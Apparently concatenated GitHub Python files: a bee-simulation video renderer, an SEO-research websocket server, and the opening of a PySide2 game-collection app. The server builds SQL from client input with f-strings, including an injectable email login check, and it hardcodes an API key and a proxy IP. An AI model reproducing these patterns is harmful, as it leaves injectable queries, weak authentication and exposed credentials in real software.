try:\n                    val = int(val)\n                except:\n                    if val.startswith(\"T\"):\n                        val = True\n                    elif val.startswith(\"F\"):\n                        val = False\n                    pass\n            cfg_opts[key] = val\n    return cfg_opts\n
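\n# The parser above expects whitespace-separated \"--key value\" pairs, one per\n# line. A hypothetical .cfg illustrating the format (keys taken from the ones\n# this script reads below):\n#\n#   --x_min -2.0\n#   --x_max 2.0\n#   --dx 0.01\n#   --t_min 0.0\n#   --t_max 10.0\n#   --dt 0.025\n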
\n\ndef imgs2vid(imgs, outpath, fps=4):\n    height, width, layers = imgs[0].shape\n    fourcc = cv2.VideoWriter_fourcc(\"m\", \"p\", \"4\", \"v\")\n    video = cv2.VideoWriter(outpath, fourcc, fps, (width, height), True)\n\n    for img in imgs:\n        video.write(img)\n\n    cv2.destroyAllWindows()\n    video.release()\n\n############# Run\nscript_config = read_config(base_exp_dir)\nX_MIN = script_config['x_min']\nX_MAX = script_config['x_max']\nDX = script_config['dx']\nGRID_SIZE = np.arange(X_MIN, X_MAX+DX, DX).shape[0]\nconvert_xy_to_index = lambda xy: ((xy - X_MIN) / (X_MAX - X_MIN)) * GRID_SIZE\n\nipynb_dev_config = False\nif ipynb_dev_config:\n    base_exp_dir = \"./\"\nenv_path = os.path.join(base_exp_dir, \"envir_hist.h5\")\nbee_path = os.path.join(base_exp_dir, \"bee_hist.h5\")\nprint(os.path.exists(env_path), os.path.exists(bee_path), env_path)\n\n# Concentration maps\nwith h5py.File(env_path, 'r') as infile:\n    cmaps = np.array(infile['concentration'])\n\n# Min and max concentrations for heatmap\nmin_c = np.min(cmaps[:])\nmax_c = np.max(cmaps[:]) * 0.8\n\n# Bee measurements\nbee_data = {}\nwith h5py.File(bee_path, 'r') as infile:\n    for key, val in infile.items():\n        bee_data[key] = np.array(val)\n\nbee_nums = np.unique(bee_data['bee_i'])\nbees = {}\nfor bee_num in bee_nums:\n    idxs = np.where(bee_data['bee_i']==bee_num)\n    bee_x = bee_data['x'][idxs]\n    bee_y = bee_data['y'][idxs]\n    bee_state = bee_data['state'][idxs]\n    distance = bee_data['distance_from_queen'][idxs]\n    bee_grads = bee_data['gradient_x'][idxs], bee_data['gradient_y'][idxs]\n    bias = bee_data['wx'][idxs], bee_data['wy'][idxs]\n    bees[bee_num] = {\"x\" : bee_x, \"y\" : bee_y, \"state\": bee_state,\n                     \"distance\": distance, \"grads\" : bee_grads}\n\n# Make frames\ncolors = [\"red\", \"gray\", \"#479030\", \"orange\", \"blue\"]\ncolor_decoder = {\n    0: colors[1],\n    1: colors[2],\n    2: colors[2],\n    3: colors[3],\n    4: colors[4]\n}\nTIME = cmaps.shape[0]\nsavepath = \"\"\nfor frame_i in range(cmaps.shape[0]):\n    sys.stdout.write(f\"\\rFrame {frame_i+1}/{TIME}\")\n    sys.stdout.flush()\n\n    # CONCENTRATION\n    cmap = cmaps[frame_i]\n    plt.imshow(cmap, cmap='Greens', vmin=min_c, vmax=max_c)\n    plt.colorbar(shrink=0.8, format='%.2f')\n\n    # QUEEN\n    queen = convert_xy_to_index(0)\n    plt.scatter(queen, queen, c=\"red\", s=100, edgecolors='black', marker='o')\n\n    # WORKERS\n    for bee_key, bee_vals in bees.items():\n        x = bee_vals['x'][frame_i]\n        y = bee_vals['y'][frame_i]\n        state = bee_vals['state'][frame_i]\n        color = color_decoder[state]\n        plt.scatter(convert_xy_to_index(x), convert_xy_to_index(y),\n                    color=color, s=30, edgecolors='black')\n\n    # FORMATTING\n    texts = [\"Queen\", \"Random walk pre-scenting\", \"Scenting\", \"Directed walk\", \"Random walk post-scenting\"]\n    patches = [ plt.plot([],[], marker=\"o\", ms=5, ls=\"\", mec=None, color=colors[i],\n                markeredgecolor=\"black\", label=\"{:s}\".format(texts[i]) )[0] for i in range(len(texts)) ]\n    plt.legend(handles=patches, bbox_to_anchor=(0.5, -0.22),\n               loc='center', ncol=2, numpoints=1, labelspacing=0.3,\n               fontsize='small', fancybox=\"True\",\n               handletextpad=0, columnspacing=0)\n    plt.xlabel(\"x\")\n    plt.ylabel(\"y\")\n    plt.xlim(0, 600)\n    plt.ylim(600, 0)\n\n    if ipynb_dev_config:\n        plt.title(f\"Q{QUEEN_BEE_A}_W{WORKER_BEE_A}_D{D}_T{THRESHOLD}_wb{WB}_decay{DECAY}_seed{SEED} \\n t: {frame_i+1}/{TIME-1}\")\n    else:\n        num_timesteps = np.arange(script_config['t_min'], script_config['t_max']+script_config['dt'], script_config['dt']).shape[0]\n        Q = script_config['queen_initial_concentration']\n        W = script_config['worker_initial_concentration']\n        D = script_config['diffusion_coefficient']\n        T = script_config['worker_threshold']\n        wb = int(script_config['worker_bias_scalar'])\n        decay = int(script_config['decay'])\n        seed = int(script_config['random_seed'])\n        title = 
f\"Q{Q}_W{W}_D{D}_T{T:0.5f}_wb{wb}_decay{decay}\"\n        savepath = f\"{title}_seed{seed}.mp4\"\n        plt.title(f\"{title} \\n t: {frame_i+1}/{TIME}\")\n\n    # SAVING FRAMES\n    file_path = f't{frame_i+1:04d}.png'\n    filename = f'movie_frames/{file_path}'\n    plt.savefig(filename, bbox_inches='tight', dpi=100)\n    plt.close()\n\n####### Stitching FRAMES\nall_img_paths = np.sort(glob2.glob(\"movie_frames/*.png\"))\nall_imgs = np.array([cv2.imread(img) for img in all_img_paths])\n\nsavepath = f\"movie_frames/{savepath}\"\nimgs2vid(all_imgs, savepath)\n","repo_name":"dieumynguyen/bee_communication_v2","sub_path":"script/make_movie.py","file_name":"make_movie.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69910277522","text":"import asyncio\nimport websockets\nimport requests\nimport json\nimport mysql.connector\nimport pathlib\nfrom unidecode import unidecode\nfrom itertools import groupby\nfrom bs4 import BeautifulSoup\nimport re\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service as ChromeService\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport threading\nimport datetime\nfrom urllib.parse import urlparse\nfrom random_user_agent.user_agent import UserAgent\nfrom random_user_agent.params import SoftwareName, OperatingSystem\n\nconfig_file = pathlib.Path(__file__).with_name(\"config.json\")\nwith open(config_file) as json_file:\n    data = json.load(json_file)\n    DB_HOST = data['DB_HOST']\n    DB_NAME = data['DB_NAME']\n    DB_USER = data['DB_USER']\n    DB_PASS = data['DB_PASS']\n    PORT = data['PORT']\n    SERVER = data['SERVER']\n    SEO_RANK_API_Key = data['SEO_RANK_API_Key']\n\n\nasync def remove_duplicates():\n    con = None\n    cursor = None\n    try:\n        con = mysql.connector.connect(user=DB_USER,\n                                      password=DB_PASS,\n                                      host=DB_HOST,\n                                      database=DB_NAME)\n        cursor = con.cursor()\n        sql = \"\"\"DELETE t1 FROM search_result t1\n            INNER JOIN (\n                SELECT search_history_id, page_url, MIN(id) min_id\n                FROM search_result\n                GROUP BY search_history_id, page_url\n                HAVING COUNT(*) > 1\n            ) t2\n            ON t1.search_history_id = t2.search_history_id\n            AND t1.page_url = t2.page_url\n            AND t1.id <> t2.min_id\"\"\"\n        cursor.execute(sql)\n        con.commit()\n    except Exception as e:\n        print(f'Error while removing duplicates: {e}')\n    finally:\n        if cursor is not None:\n            cursor.close()\n        if con is not None:\n            con.close()\n
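\n# The DELETE above uses a standard MySQL dedupe pattern: join search_result to\n# a derived table of its own (search_history_id, page_url) groups, then delete\n# every row whose id is not the group's MIN(id), keeping one row per group.\n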
\n\ndef getAPIDATA():\n    api_data = [0, '', '', 0, '', 0, 0]\n    try:\n        sql = \"SELECT * FROM `api_data` ORDER BY `hits` ASC LIMIT 1\"\n        con = mysql.connector.connect(user=DB_USER,\n                                      password=DB_PASS,\n                                      host=DB_HOST,\n                                      database=DB_NAME)\n        cursor = con.cursor()\n        cursor.execute(sql)\n        api_data = list(cursor.fetchone())\n        print(\n            f\"Successfully selected an api_key. ID: {api_data[0]}\")\n    except Exception as e:\n        print('Failed to select an api_key.', e)\n    finally:\n        cursor.close()\n        con.close()\n\n    return api_data\n\n\ndef updateHistoryChanges(search_history_id):\n    try:\n        dt_now = datetime.datetime.now()\n\n        sql = f\"UPDATE `search_history` SET `last_modified`='{dt_now.strftime('%Y-%m-%d %H:%M:%S')}' WHERE `id`='{search_history_id}'\"\n        con = mysql.connector.connect(user=DB_USER,\n                                      password=DB_PASS,\n                                      host=DB_HOST,\n                                      database=DB_NAME)\n        cursor = con.cursor()\n        cursor.execute(sql)\n        con.commit()\n    except Exception as e:\n        print('UPDATE search_history failed.', e)\n    finally:\n        cursor.close()\n        con.close()\n\n\ndef isExisting(search_history_id, domain, url):\n    existing_urls = []\n    try:\n        con = mysql.connector.connect(user=DB_USER,\n                                      password=DB_PASS,\n                                      host=DB_HOST,\n                                      database=DB_NAME)\n        cursor = con.cursor()\n        sql = f\"SELECT `page_url` FROM `search_result` WHERE `search_history_id`='{search_history_id}' AND `domain` LIKE '{domain}'\"\n        cursor.execute(sql)\n        existing_urls = [item[0] for item in cursor.fetchall()]\n    except Exception as ex:\n        print('Failed to fetch existing URLs for this domain', ex)\n    finally:\n        cursor.close()\n        con.close()\n\n    print('Existing urls', existing_urls)\n\n    if url in existing_urls:\n        return True\n    return False\n\n\ndef increaseHits(api_id):\n    try:\n        sql = f\"UPDATE `api_data` SET `hits` = `hits` + 1 WHERE `id` = {api_id}\"\n        con = mysql.connector.connect(user=DB_USER,\n                                      password=DB_PASS,\n                                      host=DB_HOST,\n                                      database=DB_NAME)\n        cursor = con.cursor()\n        cursor.execute(sql)\n        con.commit()\n        print(\n            f\"Successfully updated hits. ID: {api_id}\")\n    except Exception as e:\n        print('Failed to update a hit.', e)\n    finally:\n        cursor.close()\n        con.close()\n\n\ndef getSeoRankChecker(your_website_url):\n    try:\n        # Add https:// before your_website_url and a trailing slash at the end\n        your_website_url = your_website_url.strip(\n            '/')  # remove existing trailing slashes\n        your_website_url = \"https://\" + your_website_url + \"/\"\n\n        tried_www = False\n        while True:\n            seo_url = \"https://seo-rank-checker.p.rapidapi.com/check\"\n            seo_querystring = {\"metric\": \"mixed\"}\n            seo_payload = {\"url\": your_website_url}\n            seo_headers = {\n                \"X-RapidAPI-Key\": SEO_RANK_API_Key,\n                \"content-type\": \"application/json\",\n                \"X-RapidAPI-Host\": \"seo-rank-checker.p.rapidapi.com\"\n            }\n            seo_response = requests.request(\n                \"POST\", seo_url, json=seo_payload, headers=seo_headers, params=seo_querystring)\n            seo_json_object = json.loads(seo_response.text)\n\n            # If hostname is not a digit, retry once with \"www.\" added to the URL\n            # (retrying unconditionally here would prepend \"www.\" forever)\n            if not str(seo_json_object[\"result\"][\"semrush\"][\"links\"][\"hostname\"]).isdigit() and not tried_www:\n                your_website_url = your_website_url.replace(\n                    \"https://\", \"https://www.\")\n                your_website_url = your_website_url.rstrip(\n                    '/')  # remove any trailing slashes\n                tried_www = True\n                continue\n\n            return seo_json_object\n    except Exception as e:\n        print('***** getSeoRankChecker *****')\n        print(f'Error in {your_website_url}', e)\n        print('**********')\n\n\ndef getTitleOfPage(page_url):\n\n    # List of file extensions to check for\n    file_extensions = (\".pdf\", \".doc\", \".docx\", \".PDF\", \".DOC\", \".DOCX\")\n\n    # Get random user agent\n    software_names = [SoftwareName.CHROME.value]\n    operating_systems = [OperatingSystem.WINDOWS.value,\n                         OperatingSystem.LINUX.value]\n    user_agent_rotator = UserAgent(\n        software_names=software_names, operating_systems=operating_systems, limit=100)\n\n    # Try getting title with requests + proxy + random user agent\n    def simple_method(page_url, 
proxy=None):\n        try:\n            headers = {\"User-Agent\": user_agent_rotator.get_random_user_agent()}\n            response = requests.get(\n                page_url, proxies=proxy, headers=headers, timeout=10)\n            soup = BeautifulSoup(response.content, \"html.parser\")\n            title_tag = soup.find(\"title\")\n            if title_tag:\n                title = title_tag.text\n            else:\n                title = None\n        except Exception:\n            title = None\n        return title\n\n    # If blocked, use APILayer meta tags API\n    def get_meta_tags_using_api(page_url):\n        api_url = f\"https://api.apilayer.com/meta_tags?url={page_url}&proxy=true\"\n        headers = {\n            \"apikey\": \"fbBYQNnJgQsG7ES2dFQ7FGw53MWD3vyU\"\n        }\n        try:\n            response = requests.get(api_url, headers=headers, timeout=10)\n            status_code = response.status_code\n            result = response.text\n            return status_code, result\n        except Exception:\n            return None, None\n
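\n    # Note on control flow: grabtitle() below falls through three strategies --\n    # a proxied request with a rotated user agent, then the APILayer meta-tags\n    # API when the first response looks like a bot-protection page, and finally\n    # a direct (proxy-less) request as the last resort.\n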
\n    # Proxy used for the first scraping attempt\n    PROXY = {\"http\": \"http://193.164.199.29:3128\"}\n\n    def is_title_blocked(title, blocked_titles):\n        return title is not None and any(partial_title in title for partial_title in blocked_titles)\n\n    # Grab title function\n    def grabtitle():\n\n        if page_url.endswith(file_extensions):\n            return \"[Unreachable]\"\n\n        title = simple_method(page_url, PROXY)\n\n        blocked_titles = [\"Robot Challenge Screen\", \"Access Denied\", \"Just a moment\", \"403 Forbidden\", \"503 Service Temporarily Unavailable\", \"Security check\", \"Not Acceptable!\", \"Temporary Page\", \"Sucuri WebSite Firewall - Access Denied\", \"502 Bad Gateway\", \"520\", \"StackPath\"]\n\n        if is_title_blocked(title, blocked_titles):\n            status_code, result = get_meta_tags_using_api(page_url)\n\n            if status_code is not None and result is not None:\n                result_json = json.loads(result)  # Parse the JSON response\n                title_from_api = result_json.get(\n                    'title', None)  # Get the \"title\" value\n\n                if title_from_api is not None:\n                    return title_from_api\n                else:\n                    title = simple_method(page_url)\n                    return title if title is not None else \"[Unreachable]\"\n            else:\n                title = simple_method(page_url)\n                return title if title is not None else \"[Unreachable]\"\n        else:\n            return title if title is not None else \"[Unreachable]\"\n\n    page_title = grabtitle()\n    page_title = unidecode(page_title)\n    page_title = page_title.replace(\"’\", \"'\").replace(\"‘\", \"'\").replace(\"&#39;\", \"'\")\n    page_title = re.sub(\"[^a-zA-Z0-9-.' ]+\", \" \", page_title)\n    page_title = page_title.split('|')[0]\n    page_title = page_title.split(' - ')[0]\n    page_title = page_title.strip()\n    if page_title == '':\n        page_title = '[Unreachable]'\n    else:\n        url_parse = urlparse(page_url)\n        if url_parse.path == '' or url_parse.path == '/':\n            page_title = '[Homepage] ' + page_title\n\n    print(f\"page_url: {page_url}, page_title: {page_title}\")\n\n    return page_title\n\n\ndef data_processor(raw_message):\n    print(f'Received data as: {raw_message}')\n    json_object = json.loads(raw_message)\n    return json_object\n\n\n# A set of connected ws clients\nconnected = set()\n\n\ndef between_callback_thread(json_message, websocket):\n    loop = asyncio.new_event_loop()\n    asyncio.set_event_loop(loop)\n    loop.run_until_complete(broadcast_messages(json_message, websocket))\n    loop.close()\n\n\nasync def handler(websocket, path):\n    remote_ip = websocket.remote_address[0]\n    print(f'A client just connected at IP: {remote_ip}')\n    connected.add(websocket)\n    try:\n        async for raw_message in websocket:\n            print(\"Received message from client: \" + raw_message)\n            for conn in connected:\n                if conn == websocket:\n                    json_message = json.loads(raw_message)\n                    if 'email' in json_message and 'loggedin' in json_message:\n                        try:\n                            sql = f\"SELECT * FROM `user` WHERE `email` LIKE '{json_message['email']}'\"\n                            con = mysql.connector.connect(user=DB_USER,\n                                                          password=DB_PASS,\n                                                          host=DB_HOST,\n                                                          database=DB_NAME)\n                            cursor = con.cursor()\n                            cursor.execute(sql)\n                            users = cursor.fetchall()\n                            if len(users) > 0 and json_message['loggedin'] == 1:\n                                print(\"Authentication Success\")\n                                await websocket.send('pong')\n                            else:\n                                await websocket.close(1011, \"Authentication failed\")\n                        except Exception as e:\n                            print('Authentication failed.', e)\n                            await websocket.close(1011, \"Authentication failed\")\n                        finally:\n                            cursor.close()\n                            con.close()\n                        continue\n                    elif 'filtered_domain' in raw_message:\n                        '''\n                        # Thread sending #\n                        '''\n                        server = threading.Thread(target=between_callback_thread, args=(\n                            json_message, websocket), daemon=True)\n                        server.start()\n\n                        print(f'success broadcast_messages to {remote_ip}')\n\n    except websockets.exceptions.ConnectionClosed as e:\n        print(f\"{remote_ip} client just disconnected\")\n    finally:\n        connected.remove(websocket)\n\n\nasync def broadcast(domain_json, search_history_id, your_website_url_da, websocket=None):\n    domain = domain_json['domain']\n    traffic_sum = domain_json['traffic_sum']\n    stat_total_keywords = domain_json['total_keywords']\n\n    api_data = getAPIDATA()\n    SERANKING_TOKEN = api_data[1]\n    proxy_ip = api_data[4]\n    proxy_port = api_data[5]\n\n    proxies = {\n        'http': f'{proxy_ip}:{proxy_port}',\n        'https': f'{proxy_ip}:{proxy_port}',\n    }\n\n    url = f\"https://api4.seranking.com/research/us/keywords/?domain={domain}&type=organic&group=url&source=us&currency=USD&base_domain={domain}&sort=traffic_percent&sort_order=desc&limit=1000&offset=0\"\n    payload = {}\n    headers = {\n        'Authorization': f'Token {SERANKING_TOKEN}'\n    }\n    response = requests.request(\n        \"GET\", url, headers=headers, data=payload, proxies=proxies)\n\n    increaseHits(api_data[0])\n\n    json_object = json.loads(response.text)\n\n    json_object.sort(key=lambda content: content['url'])\n    groups = groupby(json_object, lambda content: content['url'])\n\n    stat_seo_viability = 0\n    stat_page_authority = 0\n\n    stat_domain_authority = 0\n    stat_rank = 0\n    stat_links = 0\n\n    seo_json_object = getSeoRankChecker(domain)\n    if 'success' in seo_json_object and seo_json_object['success']:\n        stat_rank = 
seo_json_object['result']['semrush']['rank']\n stat_links = seo_json_object['result']['semrush']['links']['domain']\n stat_domain_authority = seo_json_object['result']['authority']['domain']\n\n if str(stat_rank).isdigit() == False:\n stat_rank = 0\n if str(stat_links).isdigit() == False:\n stat_links = 0\n if str(stat_domain_authority).isdigit() == False:\n stat_domain_authority = 0\n\n json_result = []\n for page_url, contents in groups:\n is_existing = isExisting(search_history_id, domain, page_url)\n if is_existing:\n continue\n stat_traffic_percentage = round(sum(content['traffic_percent']\n for content in contents), 2)\n json_result.append({\n 'search_history_id': search_history_id,\n 'page_title': '',\n 'page_url': page_url,\n 'domain': domain,\n 'stat_seo_viability': stat_seo_viability,\n 'stat_traffic_percentage': stat_traffic_percentage,\n 'stat_total_keywords': stat_total_keywords,\n 'stat_domain_authority': stat_domain_authority,\n 'stat_page_authority': stat_page_authority,\n 'stat_rank': stat_rank,\n 'stat_links': stat_links,\n })\n\n json_result.sort(key=lambda content: -content['stat_traffic_percentage'])\n\n records = []\n record_cnt = 0\n batch_size = 3\n batch_records = []\n\n for content in json_result[:100]:\n try:\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n\n record_cnt += 1\n search_history_id = content['search_history_id']\n page_url = content['page_url']\n domain = content['domain']\n stat_seo_viability = content['stat_seo_viability']\n stat_traffic_percentage = content['stat_traffic_percentage']\n stat_total_keywords = content['stat_total_keywords']\n stat_domain_authority = content['stat_domain_authority']\n stat_page_authority = content['stat_page_authority']\n stat_rank = content['stat_rank']\n stat_links = content['stat_links']\n\n if record_cnt <= 3:\n stat_seo_viability = 3\n if record_cnt <= 15:\n stat_seo_viability += 1\n if your_website_url_da > stat_domain_authority:\n stat_seo_viability += 1\n if your_website_url_da - 10 < stat_domain_authority:\n stat_seo_viability += 1\n if your_website_url_da - 20 < stat_domain_authority:\n stat_seo_viability += 1\n if stat_traffic_percentage > traffic_sum * 5 / 100:\n stat_seo_viability += 1\n if stat_traffic_percentage > traffic_sum * 20 / 100:\n stat_seo_viability += 1\n if stat_traffic_percentage > traffic_sum * 40 / 100:\n stat_seo_viability += 1\n\n # get page title\n page_title = getTitleOfPage(page_url)\n '''\n Insert search_result for page_url into database\n '''\n val = (\n search_history_id, page_title, page_url, domain, stat_seo_viability, stat_traffic_percentage, stat_total_keywords, stat_domain_authority, stat_page_authority, stat_rank, stat_links\n )\n\n sql = \"\"\"\n INSERT INTO `search_result` \n (search_history_id, page_title, page_url, domain, stat_seo_viability, \n stat_traffic_percentage, stat_total_keywords, stat_domain_authority, \n stat_page_authority, stat_rank, stat_links) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n cursor.execute(sql, val)\n \n lastrowid = cursor.lastrowid\n if lastrowid < 1:\n continue\n \n updateHistoryChanges(search_history_id)\n \n batch_records.append({\n 'id': lastrowid,\n 'search_history_id': search_history_id,\n 'page_title': page_title,\n 'page_url': page_url,\n 'domain': domain,\n 'stat_seo_viability': stat_seo_viability,\n 'stat_traffic_percentage': stat_traffic_percentage,\n 'stat_total_keywords': stat_total_keywords,\n 'stat_domain_authority': 
stat_domain_authority,\n 'stat_page_authority': stat_page_authority,\n 'stat_rank': stat_rank,\n 'stat_links': stat_links,\n })\n \n if record_cnt % batch_size == 0:\n con.commit()\n \n if websocket is not None:\n try:\n await websocket.send(json.dumps(batch_records))\n except Exception as ex:\n print('Exception in Websocket send', ex)\n \n print(f'***** Success to send {record_cnt} records *****')\n batch_records = []\n \n except Exception as ex:\n print('Exception in Content data within 100', ex)\n \n if batch_records:\n con.commit()\n if websocket is not None:\n try:\n await websocket.send(json.dumps(batch_records))\n except Exception as ex:\n print('Exception in Websocket send', ex)\n \n print(f'***** Success to send {record_cnt} records *****')\n \n # Don't forget to close the cursor and connection at the end\n cursor.close()\n con.close()\n\n\nasync def broadcast_messages(json_object, websocket):\n search_history_id = json_object['search_history_id']\n filtered_domain = json_object['filtered_domain']\n your_website_url = json_object['your_website_url']\n domains = json.dumps(filtered_domain)\n\n try:\n sql = f\"UPDATE `search_history` SET `domains` = '{domains}' WHERE `id` = {search_history_id}\"\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n cursor.execute(sql)\n con.commit()\n print(\n f\"search_history domains update success. ID: {search_history_id}\")\n except Exception as e:\n print(f'search_history domains update failed.', e)\n finally:\n cursor.close()\n con.close()\n\n seo_json_object = getSeoRankChecker(your_website_url)\n your_website_url_da = 0\n\n if 'success' in seo_json_object and seo_json_object['success']:\n your_website_url_da = seo_json_object['result']['authority']['domain']\n\n for domain_json in filtered_domain:\n try:\n await broadcast(domain_json, search_history_id, your_website_url_da, websocket)\n except Exception as e:\n print(f'There is an issue to broadcast in {your_website_url}', e)\n try:\n sql = f\"UPDATE `search_history` SET `status`='COMPLETED' WHERE `id`={search_history_id}\"\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n cursor.execute(sql)\n con.commit()\n print(\n f\"search_history status updated as 'COMPLETED', ID: {search_history_id}\")\n except Exception as e:\n print(f'search_history status updated failed.', e)\n finally:\n cursor.close()\n con.close()\n print('***** COMPLETED *****')\n await websocket.send('COMPLETED')\n\n\nasync def do_stuff_periodically(interval):\n while True:\n await asyncio.gather(\n asyncio.sleep(interval),\n search_history_checker(),\n remove_duplicates()\n )\n \n\ndef cron_search_progress_checker():\n print(\"***** cron_search_progress_checker starting...*****\")\n asyncio.run(do_stuff_periodically(60*1))\n\n\nasync def search_history_checker():\n print('**** create search_history_checker...')\n\n try:\n dt_30mins_ago = datetime.datetime.now() - datetime.timedelta(minutes=1)\n con = mysql.connector.connect(user=DB_USER,\n password=DB_PASS,\n host=DB_HOST,\n database=DB_NAME)\n cursor = con.cursor()\n sql = f\"SELECT * FROM `search_history` WHERE `status` LIKE 'PROGRESS' AND `domains` IS NOT NULL AND `last_modified` < '{dt_30mins_ago.strftime('%Y-%m-%d %H:%M:%S')}' ORDER By `last_modified` DESC LIMIT 1\"\n cursor.execute(sql)\n search_history_rows = cursor.fetchall()\n cursor.close()\n con.close()\n\n for row in search_history_rows:\n \n id = row[0]\n 
your_website_url = row[6]\n\n            if not row[11]:\n                continue\n\n            try:\n                filtered_domain = json.loads(row[11])\n            except json.JSONDecodeError:\n                print(f\"Failed to decode JSON for row: {row}\")\n                continue\n\n            if filtered_domain is None:\n                continue\n\n            seo_json_object = getSeoRankChecker(your_website_url)\n            your_website_url_da = 0\n\n            if 'success' in seo_json_object and seo_json_object['success']:\n                your_website_url_da = seo_json_object['result']['authority']['domain']\n\n            try:\n                con = mysql.connector.connect(user=DB_USER,\n                                              password=DB_PASS,\n                                              host=DB_HOST,\n                                              database=DB_NAME)\n                cursor = con.cursor()\n                sql = f\"SELECT `domain` FROM `search_result` WHERE `search_history_id`={id} GROUP BY `domain`\"\n                cursor.execute(sql)\n                domains = [item[0] for item in cursor.fetchall()]\n                print(f'existing domains: {domains}')\n                print(f'{sql} Success')\n            except Exception as e:\n                print(f'{sql} Failed', e)\n            finally:\n                cursor.close()\n                con.close()\n\n            for domain_json in filtered_domain:\n                domain = domain_json['domain']\n                if domain in domains:\n                    continue\n                try:\n                    await broadcast(domain_json, id, your_website_url_da)\n                except Exception as e:\n                    print(\n                        'There was an issue broadcasting in search_history_checker')\n\n            try:\n                con = mysql.connector.connect(user=DB_USER,\n                                              password=DB_PASS,\n                                              host=DB_HOST,\n                                              database=DB_NAME)\n                cursor = con.cursor()\n                sql = f\"UPDATE `search_history` SET `status`='COMPLETED' WHERE `id`={id}\"\n                cursor.execute(sql)\n                con.commit()\n                print(\n                    f\"search_history status updated as 'COMPLETED', ID: {id}\")\n            except Exception as e:\n                print('search_history status update failed.', e)\n            finally:\n                cursor.close()\n                con.close()\n            print('***** COMPLETED *****')\n    except Exception as e:\n        print('search_history PROGRESS query failed.', e)\n\n    print('**** search_history_checker end...')\n\nif __name__ == \"__main__\":\n    api_data = getAPIDATA()\n    print(api_data)\n    print(api_data[6])\n    _cron_thread = threading.Thread(target=cron_search_progress_checker)\n    _cron_thread.start()\n\n    print('socket is starting...')\n    start_server = websockets.serve(handler, SERVER, PORT, ssl=None)\n    asyncio.get_event_loop().run_until_complete(start_server)\n    asyncio.get_event_loop().run_forever()\n","repo_name":"jmsprsns/tfserver","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":26100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17467854580","text":"#!/usr/bin/env python\nfrom os import path\nfrom time import sleep\n\nimport requests\nfrom PySide2.QtGui import QIcon\nfrom PySide2.QtSql import QSqlDatabase, QSqlQuery\nfrom PySide2.QtWidgets import QMainWindow, QDialog, QTabWidget, \\\n    QAction, QMenu, QApplication, QMessageBox, QLineEdit, QDesktopWidget, \\\n    QWidget, QLabel, QPushButton, QInputDialog, QProgressBar, QVBoxLayout, QComboBox, QHBoxLayout\n\nfrom utilities.exportcsv import sql2csv\nfrom utilities.fetchinfo import getMobyRelease\nfrom utilities.fetchprice import getPriceData\nfrom utilities.steamlibrary import getSteamLibrary\nfrom utilities.log import logger\nfrom widgets.importwindow import ImportWindow\nfrom widgets.inputwindow import InputWindow\nfrom widgets.overview import Overview\nfrom widgets.randomizer import Randomizer\nfrom widgets.filterdock import FilterDock\nfrom widgets.sidepanel import SidePanel\nfrom widgets.table import Table\n\n_VERSION = \"0.5.3\"\n\n\nclass MainWindow(QMainWindow):\n\n    # noinspection PyUnresolvedReferences\n    def __init__(self, dbpath):\n
super(MainWindow, self).__init__()\n\n # 'Add to collection' window\n self.addWindow = None\n\n # 'Import games' window\n self.importWindow = None\n\n # Side panel\n self.sidePanel = SidePanel()\n\n # Tables and their databases\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\n db.setDatabaseName(dbpath)\n if not db.open():\n logger.critical(f\"Couldn't open database: {db.lastError().text()}\")\n QMessageBox.critical(None, \"Database Error\", db.lastError().text())\n self.gamesTableView = Table(\"games\", db)\n self.gamesTableView.doubleClick.connect(self.sidePanel.showDetails)\n self.consolesTableView = Table(\"consoles\", db)\n self.consolesTableView.doubleClick.connect(self.sidePanel.showDetails)\n self.accessoriesTableView = Table(\"accessories\", db)\n self.accessoriesTableView.doubleClick.connect(self.sidePanel.showDetails)\n self.tableViewList = [self.gamesTableView,\n self.consolesTableView,\n self.accessoriesTableView]\n\n self.allPlatforms = set()\n self.allRegions = set()\n self.allGenres = set()\n self.allYears = set()\n for table in self.tableViewList:\n for row in table.ownedItems():\n self.allPlatforms.add(row[\"platform\"])\n self.allRegions.add(row[\"region\"])\n self.allYears.add(row[\"year\"])\n # Split multi-genre entries\n for genre in row[\"genre\"].split(\", \"):\n self.allGenres.add(genre)\n\n self.filterDock = FilterDock(sorted(self.allPlatforms, key=str.lower),\n sorted(self.allRegions, key=str.lower),\n sorted(self.allGenres, key=str.lower),\n sorted(self.allYears, key=str.lower))\n\n # Overview tab\n self.overview = Overview(self.tableViewList)\n\n # Randomizer tab\n self.randomizer = Randomizer(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower))\n self.randomizer.consoleList.itemClicked.connect(self.updateStatusbar)\n self.randomizer.genreList.itemClicked.connect(self.updateStatusbar)\n self.randomizer.genreMatchExclusiveCB.stateChanged.connect(self.updateStatusbar)\n self.randomizer.btnAll.clicked.connect(self.updateStatusbar)\n self.randomizer.btnNone.clicked.connect(self.updateStatusbar)\n\n ## MainWindow layout\n # Widgets\n self.centralWidget = QWidget()\n self.setCentralWidget(self.centralWidget)\n self.tab = QTabWidget()\n\n self.toolbar = self.addToolBar(\"Exit\")\n self.toolbar.addAction(self.buttonActions(\"exit\"))\n self.toolbar.addAction(self.buttonActions(\"add\"))\n self.toolbar.addAction(self.buttonActions(\"import\"))\n\n self.fileMenu = self.menuBar().addMenu(self.tr(\"&File\"))\n self.fileMenu.addAction(self.buttonActions(\"add\"))\n self.fileMenu.addAction(self.buttonActions(\"export\"))\n self.fileMenu.addAction(self.buttonActions(\"import\"))\n self.fileMenu.addAction(self.buttonActions(\"steam\"))\n self.fileMenu.addAction(self.buttonActions(\"fetch\"))\n self.fileMenu.insertSeparator(self.buttonActions(\"exit\"))\n 